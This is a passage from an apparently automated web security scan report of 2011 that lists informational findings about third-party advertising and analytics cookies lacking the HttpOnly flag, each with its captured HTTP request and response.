Request

GET /b?c1=7&c2=8097938&rn=334886919&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.wmg.com%252Fnewsdetails%252Fid%252F8a0af812309ad0530130ae22179a018e%26jsref%3Dhttp%253A%252F%252Fwww.wmg.com%252Fnews%26rnd%3D1308834509061&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.wmg.com%2Fnewsdetails%2Fid%2F8a0af812309ad0530130ae22179a018e&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.wmg.com%2Fnewsdetails%2Fid%2F8a0af812309ad0530130ae22179a018e&jsref=http%3A%2F%2Fwww.wmg.com%2Fnews&rnd=1308834509061
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 23 Jun 2011 13:08:29 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:29 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

8.13. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 11:13:03 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.vitimb.com/new-inventory
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 23 Jun 2011 11:13:03 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 11:13:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.14. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:19 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3005648&d.c=gif&d.o=wmg&d.x=13037903&d.t=page&d.u=http%3A%2F%2Fwww.wmg.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wmg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 23 Jun 2011 13:08:19 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.15. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Sun, 17-Jun-2012 13:44:52 GMT; Path=/
pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Fri, 22-Jun-2012 13:44:52 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530912&ev=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; V=8vciuQJMXXJY; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; cw=cw; FC1-WC=^56837_1_39y0y; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Sun, 17-Jun-2012 13:44:52 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Fri, 22-Jun-2012 13:44:52 GMT; Path=/
Content-Type: image/gif
Date: Thu, 23 Jun 2011 13:44:52 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A3=le30aXzs06hH00001jDClaTYi0cbS00001kkgaaRpa038X00001jkozaUUI0c7w00001iWmhaSED0cb1000019bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000jNtbaUUO09sO00000jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001kSEGaZWa03sY00001iOnPaUUK03sY00001jxYWaUMm0bn800001jpQXaRwv05qO00001kPIlaZWa03sY00000hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001lEOyaYx40cie00001jkncaRBL0c7w00001eBxyaZST03iw00001jBrJaXnt035P00001kSTxaRuU06yP00001lFP5aZRG0dSu00001jDBSaZUd0cbS00001kSCsaZWb03sY00001jNtfaUUK09sO00000kCKXaXnm08HG00001jDDva+WE0cbS00002kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001iz3QaZRG0bnA00001lu0naYvn0czN00002kcLvaUUK0dCb00001iyQIaYRd0bnA00001; expires=Wed, 21-Sep-2011 09:44:27 GMT; domain=.serving-sys.com; path=/
B3=8Vlw0000000001u+78ox0000000001vcanad0000000001vc9j0T0000000001u+990p0000000001v5aJmE0000000001vcajpm0000000001vc9ZD90000000001uQ9cm20000000001uTajpn0000000000vc8SCH0000000001vcalVe0000000001u+amoJ0000000001v5a0fG0000000001uZajUW0000000001u+89+70000000001uQ9XzA0000000001u+9xv30000000002vf9xvo0000000001vc93LT0000000001uQ84hR0000000002uQ8n.z0000000000v99xux0000000001uXa9it0000000001uQ9D2u0000000000u+9X5M0000000001uW8SC30000000001v9aF7y0000000002v89iQ70000000002uQ9D2y0000000000u+9.360000000001v89xuy0000000001uX7dOu0000000001uY9XJ40000000001uRajpj0000000001vc90mq0000000001v59qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+4ZUH0000000002vc; expires=Wed, 21-Sep-2011 09:44:27 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2496451&PluID=0&w=728&h=90&ord=7295187&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/t%3B240588446%3B0-0%3B1%3B62427920%3B3454-728/90%3B41976038/41993826/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000rFIcsM%5f; A3=le30aXzs06hH00001jDClaTYi0cbS00001kkgaaRpa038X00001jkozaUUI0c7w00001iWmhaSED0cb1000019bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000jNtbaUUO09sO00000jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001kSEGaZWa03sY00001iOnPaUUK03sY00001jxYWaUMm0bn800001jpQXaRwv05qO00001kPIlaZWa03sY00000hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001lEOyaYx40cie00001jkncaRBL0c7w00001eBxyaZST03iw00001jBrJaXnt035P00001kSTxaRuU06yP00001lFP5aZRG0dSu00001jDBSaZUd0cbS00001kSCsaZWb03sY00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001iz3QaZRG0bnA00001lu0naYvn0czN00002kcLvaUUK0dCb00001iyQIaYRd0bnA00001; B3=8Vlw0000000001u+a9iq0000000001uQ78ox0000000001vcanad0000000001vc9j0T0000000001u+990p0000000001v5aJmE0000000001vcajpm0000000001vc9ZD90000000001uQ9cm20000000001uTajpn0000000000vc8SCH0000000001vcalVe0000000001u+amoJ0000000001v5a0fG0000000001uZajUW0000000001u+89+70000000001uQ9XzA0000000001u+9xvo0000000001vc93LT0000000001uQ84hR0000000002uQ8n.z0000000000v99xux0000000001uXa9it0000000001uQ9D2u0000000000u+9X5M0000000001uW8SC30000000001v9aF7y0000000002v89iQ70000000002uQ9D2y0000000000u+9.360000000001v89xuy0000000001uX7dOu0000000001uY9XJ40000000001uRajpj0000000001vc90mq0000000001v59qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+4ZUH0000000002vc

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzs06hH00001jDClaTYi0cbS00001kkgaaRpa038X00001jkozaUUI0c7w00001iWmhaSED0cb1000019bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000jNtbaUUO09sO00000jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001kSEGaZWa03sY00001iOnPaUUK03sY00001jxYWaUMm0bn800001jpQXaRwv05qO00001kPIlaZWa03sY00000hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001lEOyaYx40cie00001jkncaRBL0c7w00001eBxyaZST03iw00001jBrJaXnt035P00001kSTxaRuU06yP00001lFP5aZRG0dSu00001jDBSaZUd0cbS00001kSCsaZWb03sY00001jNtfaUUK09sO00000kCKXaXnm08HG00001jDDva+WE0cbS00002kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001iz3QaZRG0bnA00001lu0naYvn0czN00002kcLvaUUK0dCb00001iyQIaYRd0bnA00001; expires=Wed, 21-Sep-2011 09:44:27 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+78ox0000000001vcanad0000000001vc9j0T0000000001u+990p0000000001v5aJmE0000000001vcajpm0000000001vc9ZD90000000001uQ9cm20000000001uTajpn0000000000vc8SCH0000000001vcalVe0000000001u+amoJ0000000001v5a0fG0000000001uZajUW0000000001u+89+70000000001uQ9XzA0000000001u+9xv30000000002vf9xvo0000000001vc93LT0000000001uQ84hR0000000002uQ8n.z0000000000v99xux0000000001uXa9it0000000001uQ9D2u0000000000u+9X5M0000000001uW8SC30000000001v9aF7y0000000002v89iQ70000000002uQ9D2y0000000000u+9.360000000001v89xuy0000000001uX7dOu0000000001uY9XJ40000000001uRajpj0000000001vc90mq0000000001v59qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+4ZUH0000000002vc; expires=Wed, 21-Sep-2011 09:44:27 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 23 Jun 2011 13:44:27 GMT
Connection: close
Content-Length: 2050

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

8.17. http://cw-m.d.chango.com/m/cw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cw-m.d.chango.com
Path:	/m/cw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Sun, 20 Jun 2021 13:44:51 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; _i_pm=1

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-07-23
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Sun, 20 Jun 2021 13:44:51 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 30 Jun 2011 13:44:51 GMT; Path=/
Connection: close

8.18. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Tue, 20-Dec-2011 13:45:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=7937131853506544491&fpid=12&nu=n&t=&sp=n&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3598886902647137246

Response

8.19. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.turn.com
Path:	/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:45:04 GMT; Path=/
uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:45:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 HTTP/1.1
Host: d.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=7937131853506544491&fpid=12&nu=n&t=&sp=n&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUUIXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg513r3ZIOVck9DhuO6-IqSFo3gxgaYckbvkUit6dggY5hHk7xWvxGLYUnQUrfHnC2Gqe7d21Tw1bGbBC95icxGNgrqXK0KyGesFe6hp6T2h-gtTTHNROdRJkLW60A5ndHmAPhgonwfQhEeePqfqzvmoq8_lBesygiIexbjc4i-o7dvenXltfs4lBeLOoVY-5Ey0a54agTyYUq_bAlM32IeJPP1nrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6ER24q8YARiXvoueVF-B0Y7g6rNYgVxbvf599PPhoGkRwfdcxy6ywBRL0NjuPNLjyQkIkVHFILGNxnKUUZcH3JqRMh7s8KySk9WZWXmyLhGVZrs1C9m3PofcnmLKlVpgqYp9o6yvy84eluGVbohcnU12x7ZGYBjzf2udup-eHNa_Z2l9TAOlxk6MdeH2Q0QN4u8lwEjJzCAh1JYBH_NCxDWLbRgPNRTtLafwg9EA77wPIbJK2DjVNxAKeXIyhPIlCfc2QcZO8j6n47WVoKyeRrwcQGp1RlCeoRdbDS-DCdBrizXyhwoKg_Jo1APlrFxO5Qk18ocKCoPyaNQD5axcTuUJJH99Vdy7-581u2dx9OI_4HSK4Sdj5ZIO--EDaPhCReB0iuEnY-WSDvvhA2j4QkXgSVUeVLhXuLgjvBuZxgQvSw11T9tbDb-gupP-B4n2vxWNdU_bWw2_oLqT_geJ9r8VkGGD6sgfruhLxbvILRkdNlBhg-rIH67oS8W7yC0ZHTZKfRWXpUe2qeTc9JXMrn9VebJJoszGDQ3Eaexwt4cZZnUf20A3lCmjUuR-61VCX-NvU4nZmT5VF5Zn8llrbxzhrIPwEo3vkVRKHPopqx1EXu9w1q2IoQvSKH3wx5RmjqUvcNatiKEL0ih98MeUZo6lP2y8DrZPXMQA47HQ2Q16DsjEvzTmFPT5iAsrcfOLHBZIxL805hT0-YgLK3HzixwWTSa5W4FegvUpGyjvuJ6ISMoqk7YbtQbg4XBUuKMramGKKpO2G7UG4OFwVLijK2phoX8bz27oRd3gSS6KBPjreNNE1kZitqao1cu52aL_QsOTRNZGYramqNXLudmi_0LDk0TWRmK2pqjVy7nZov9Cw4rvuDFraCo_Irvttq09dSPZOg_D4rinflq6mkPppcy6WToPw-K4p35auppD6aXMulk6D8PiuKd-WrqaQ-mlzLphlGpNv9ySx5Y5purEM9X4YcjuFEJGiw-vacCiCpLSdSHI7hRCRosPr2nAogqS0nUhyO4UQkaLD69pwKIKktJ1NCbbhlIiub2GEITxbR40HbQm24ZSIrm9hhCE8W0eNB29dWr6tv75cpLr2rKDGkGO3Qb3R2V5rwcL9Xr_UowWOh0G90dlea8HC_V6_1KMFjodBvdHZXmvBwv1ev9SjBY6EMYtI4wwQkC7G7iE0RNYtRDGLSOMMEJAuxu4hNETWLUQxi0jjDBCQLsbuITRE1i1P36QK_2LIj8IKz8yMZslPduDWDlSILalHR2_729wlJWbg1g5UiC2pR0dv-9vcJSVm4NYOVIgtqUdHb_vb3CUlaget-adSpZ90cEnqTFdoWvEzGF1_8IOlgq7Oe0jPdomO2tcbi2u9EDm-HhlRVfdZU; fc=U63FSbWkuQ-6Ehv_rHNvdi3zAlciDD1979_v8BQ05hrif4ZYhbsuYcnc3E8aiw7N0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnO8MiwtslG4QC6vJ2mX9tHFSgQ0O9mROJGoCL9gdek9ttRbI5dYkL5pqtEW6ywS8ZDwwSRX2lC4Qe-JwlhlCZWTw_zLWP1yseKkJfFCIGqWZ; 